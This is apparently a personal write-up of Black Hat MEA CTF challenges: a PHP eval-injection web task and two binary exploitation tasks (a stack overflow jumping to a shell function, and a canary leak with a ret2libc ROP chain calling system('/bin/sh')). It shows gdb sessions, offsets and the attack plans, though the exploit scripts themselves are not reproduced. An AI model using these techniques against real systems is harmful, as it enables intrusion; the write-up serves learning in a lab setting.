BLACK HAT MIDDLE EAST AND AFRICA CTF

This is yet another awesome ctf i played. Below is a writeup of the challenges i solved.

Web Exploitation

peeHpee

This an easy web challenge and this is how i solved it

The next thing to do is intercept the request using burpsuite .From here we can decide what do

so we get a nice comment there that we should check the source parameter, juicy right ? 😍

Nice when we set the source parameter we get the php source code. This is nice since we can now use the code to find our way in. Since i don’t understand the code , we can use php’s interactive shell to do some testing.

First from the source code we know the email should be admin@naruto.com
//Notice they are using strict comparison so php type juggling wont apply here . Sad🥲
Second we know the password is SuperSecRetPassw0rd , but sadly if we give this values as our input we get response Hacking Attempt detected
//This is because there is some checks been done on the password . From the screenshot we can note some interesting parts 
a)  $x=$_POST["test"]; 
    - so if we post a value with parameter test , it will be      assigned to x variable.
b) eval("return \$inp=\"$inp\";")
    - we are using eval function on the users input , this is dangerous since this php function will execute users input as php valid code.

Now we can use this knowledge to test the theory .

php -a

Now lets use our findings to get the flag :)

Exactly what we were supposed to do 😊😊

Exploit Development

fno-stack-protector

Here we are provided with a binary , first thing we can do is check the properties of the binary.

➜  fnostack_protector checksec --format=json --file=main | jq .main

This looks like a tough one, but at least canary is off so we don’t have to worry about it.Next lets try to learn what the binary is doing by running it and trying some inputs on it ie if it asks for input :)

python3 -c "print('A'*40)" | ./main

Nice , we get a segmentation fault . Lets go ahead to check the functions present in the binary.

nm -j main | grep -v "__"

so this 3 functions stand out , we can use gdb disassember to get the disassembly of vuln and bad_function functions.

so from the disassembly we can tell that if we jump into bad_function we will land into a shell.we can also note that in vuln function is where we get an overflow since we are reading more than the local variable can hold.

since we have a theory on what to do we can jump in and do dynamic analysis now.

set a breakpoint at vuln function's ret instruction and lets overflow the buffer with a pattern.This way we can get the offset.

Lets get the offset now

now we know the offset is 18, next thing we need to do is figure out how we will jump into bad_function .Since we can't be able to leak any address this will be tough😂😂 . Lets run the binary again and see whether the stack has a useful address we can use. Plus also you remember how every function is placed into their own stack frames on the stack 🤔🤔, nice , means the return value can be some address close to what we want, hmm! lets see..

Exactly we can overflow with an 8 at the end to jump into bad_function, In cases like this you need to get very careful on how you send your input. You should probably use ctr+d for obvious reasons that we know🤭

So we can use my script to do just that and land on shell :)

now run the script with args remote to land on a shell remotely😍

secret_note

Like any of the exploit development challenges we are given docker file with the necessary binaries .Lets check the security properties of the binary .

➜  secret_notes checksec --format=json --file=main | jq .main

Oh man all security protections are enabled, looks like its gonna be tough🥲. Lets run the binary and see what exactly its doing…

This looks like its gonna be easy than i thought😂😂,First lets get the canary value , because the “stack smashing detected message” has really started getting into my nerves . we can use gdb for that...
➜  secret_notes gdb main -q
(gdb) set disassembly-flavor intel
(gdb) set pagination off
(gdb) disass main
(gdb) b *main+143
(gdb) r

so the 11th value in the stack holds the canary value, so we are gonna make sure that in our exploit we get to place the input this way:
junk + canary + junk
so the next thing we need to do is get the offset to canary :) 

so lets get the offset : 

so the offset is 56 , nice. Next thing we need to do now is decide what we want to do after we overflow the buffer
Well one thing we can to is do a ret2libc attack using some rop since in 64 bit binaries',function calling is different . we need to use gadgets for that :) 
Lets leak some values and see

well the 4th and 5th value looks promising to me, i’ll just use the 4th . lets subtract it from the libc base and get the offset .

➜  ~ python3
Python 3.10.5 (main, Jun  8 2022, 09:26:22) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> libc = 0x7ffff7c00000
>>> addr = 0x7ffff7df4a50
>>> hex(addr - libc)
'0x1f4a50'
So next thing is a visual of how the exploit will look like
junk + canary + junk + rop
our rop will entail this
system("/bin/sh")
so we will need to get offset from canary to the return value , easy to find using a script . i found it to be 8, the way to find it is use a script that will take the 11th value and place it at you 56th value input then add another pattern :D and send it as the second input :)
we need to get offset of our gadget , ie pop rdi ,ret
i will use ropper for this : 

now having all that we can come up with a simple script to drop us into a shell 😋😋😋

well lets see if its working locally :D

well well this looks likes its working 😂 , waaait!probably ,this wont work on the remote server because they might be using a different libc version. 
Gilbert tells me i have to build the docker image they provided and get their libc from there . Oh man 😂😂😂 so long as my exploit works locally i won't touch it...
Am guessing i'll have to do a separate note now using their libc from docker😂😂😂 Till next time :D